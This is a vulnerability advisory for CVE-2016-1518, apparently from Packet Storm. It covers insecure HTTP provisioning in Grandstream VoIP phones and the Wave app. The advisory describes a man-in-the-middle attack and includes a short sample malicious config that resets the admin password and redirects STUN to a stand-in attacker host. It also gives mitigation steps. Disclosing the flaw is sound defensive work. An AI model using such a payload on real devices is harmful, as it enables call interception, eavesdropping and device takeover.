what you don't know can hurt you

Grandstream Wave 1.0.1.26 Man-In-The-Middle

Grandstream Wave 1.0.1.26 Man-In-The-Middle
Posted Mar 17, 2016
Authored by Georg Lukas

The Grandstream VoIP products deploy a remote provisioning mechanism that allows to automatically set configuration elements on phone/app startup. By default, an insecure connection to `fm.grandstream.com` is used to obtain the provisioning profile. An active attacker can redirect this request and change arbitrary values of the configuration. This allows to redirect phone calls through a malicious server, turn the phone into a bug, change passwords, and exfiltrate system logs (including the phone numbers dialed by the user).

tags | advisory, remote, arbitrary
advisories | CVE-2016-1518
MD5 | bae9a0ebba1ee3cef010efe0194b2c22

Grandstream Wave 1.0.1.26 Man-In-The-Middle

Change Mirror Download
CVE-2016-1518: GrandStream Android VoIP Phone / App Provisioning
Vulnerability
============================================================================
==

Affected app: [Grandstream Wave][GSWAVE] version 1.0.1.26 (and probably
earlier)

Affected device: [Grandstream GXV3275][GXV3275] Android desk phone, version
1.0.3.55 (probably others as well)

Classification:

* [CWE-300 Channel Accessible by Non-Endpoint][CWE300]
* [CWE-319 Cleartext Transmission of Sensitive Information][CWE319]
* CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H (score 8.1)

## Summary

The Grandstream VoIP products deploy a remote provisioning mechanism that
allows to automatically set configuration elements on phone/app startup. By
default, an insecure connection to `fm.grandstream.com` is used to obtain
the
provisioning profile. An active attacker can redirect this request and
change
arbitrary values of the configuration. This allows to redirect phone calls
through a malicious server, turn the phone into a bug, change passwords, and
exfiltrate system logs (including the phone numbers dialed by the user).
The
changes are stored locally, so a single successful attack is sufficient to
gain permanent control of the device.

## Details

Grandstream devices are meant to be deployed in corporate environments,
where
central manageability is key. Therefore, they offer an auto-provisioning
mechanism that allows central configuration of the VoIP and administrative
settings, both in the physical products (Android-based desk phones like the
GXV3275), and in the app deployed via Google Play ([Grandstream
Wave][GSWAVE]).

The auto-provisioning works by regularly downloading certain configuration
files from a URL that is internally configured as the *Config Server Path*.
The default *Config Server Path* is `http://fm.grandstream.com/gs/` which
causes the phone/app to request provisioning data over an insecure channel
from a server operated by Grandstream.

The desk phone downloads the configuration every 60 seconds, the app once on
launch. Multiple configuration files are requested from the server, to allow
specific and generic configuration:

* `cfg<MAC>` (desk phone only)
* `cfg<MAC>.xml` (desk phone and app)
* `cfg.xml` (desk phone and app)

`cfg<MAC>` is a plaintext file containing key-value pairs, `cfg*.xml` are
XML
files based on a similar key-value schema. `<MAC>` is the MAC address of the
device, without byte delimiters.

Passive attackers can obtain the MAC address of the device running the VoIP
application, as well as eventual provisioning elements returned by the
server.

Active attackers can perform a Man-in-the-Middle attack (e.g. by means of
ARP
spoofing or DNS poisoning) to redirect the request to a maliciously crafted
configuration file, re-provisioning the phone with new settings.

## Impact

The provisioning file can change any aspect of the VoIP functionality. It
contains key-value pairs for different options (Pxxx), e.g. the following to
change the admin password (P2) and to redirect STUN traffic (P76):

<?xml version="1.0" encoding="UTF-8" ?>
<gs_provision version="1">
<config version="1">
<P2>haha-pwn3d</P2>
<P76>stun.mallory.evil</P76>
</config>
</gs_provision>

The GXV3275 phone has over 1600 different settings that can be configured
this
way, including:

* Changing of admin and user passwords
* Adding or replacing VoIP accounts / servers
* Turning the phone into a bug by setting a "silent" ringtone and enabling
auto-answer
* Enabling syslog logging to an attacker-controlled server
* Changing the Config Server Path URL to a server controlled by the
attacker,
allowing to push new configuration after the initial Man-in-the-Middle
attack

A full list of configuration options for different devices is available in
the
"Configuration Template" on the [GrandStream server][GSTOOLS].

## Mitigation

On the Wave app, the only way to close the issue is by disabling remote
provisioning. This can be achieved by entering an empty URL:

1. Open "GSWave"
2. Switch to the "Settings" tab
3. Open "Advanced Settings" menu
4. Set "Config Server Path" to an empty string

On the GXV3275 desk phone, it is also possible to deploy secure provisioning
by switching the provisioning mode to HTTPS and enabling certificate chain
validation.

1. Open the administrative web interface
2. Switch to the "Maintenance" tab
3. Select the "Upgrade" menu
4. Set "Validate Certificate Chain" to "**Yes**"
5. Set "Upgrade Via" to "**HTTPS**"

After disabling / securing the auto-provisioning, **all configuration
elements** should be checked for prior manipulation, e.g. by exporting and
inspecting the phone configuration file.

## Timeline

* 2015-11-24 Discovery of the issue
* 2015-11-24 Requested CVE number
* 2015-12-01 Notification of vendor
* 2016-01-20 CVE number assigned
* 2016-03-16 Public disclosure

## Contact

Please contact Dr. Georg Lukas with any further questions regarding this
vulnerability.

PDF version:
http://rt-solutions.de/images/PDFs/Veroeffentlichungen/CVE-2016-1518-insecur
e-provisioning.pdf
[GSWAVE]: https://play.google.com/store/apps/details?id=com.softphone
[GXV3275]:
http://www.grandstream.com/products/ip-video-telephony/ip-video-phones-andro
id/product/gxv3275
[GSTOOLS]: http://www.grandstream.com/support/tools
[CWE300]: https://cwe.mitre.org/data/definitions/300.html
[CWE319]: https://cwe.mitre.org/data/definitions/319.html

--
Dr.-Ing. Georg Lukas
rt-solutions.de GmbH
Oberländer Ufer 190a
D-50968 Köln

Tel. : (+49)221 93724 16
Fax : (+49)221 93724 50
Mobil: (+49)179 4176591
Web : www.rt-solutions.de
rt-solutions.de
experts you can trust.

Sitz der Gesellschaft: Köln
Eingetragen beim Amtsgericht Köln: HRB 52645
Geschäftsführer: Prof. Dr. Ralf Schumann, Dr. Stefan Schemmer

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

September 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    1 Files
  • 2
    Sep 2nd
    38 Files
  • 3
    Sep 3rd
    30 Files
  • 4
    Sep 4th
    15 Files
  • 5
    Sep 5th
    12 Files
  • 6
    Sep 6th
    17 Files
  • 7
    Sep 7th
    3 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    24 Files
  • 10
    Sep 10th
    22 Files
  • 11
    Sep 11th
    22 Files
  • 12
    Sep 12th
    15 Files
  • 13
    Sep 13th
    5 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    0 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close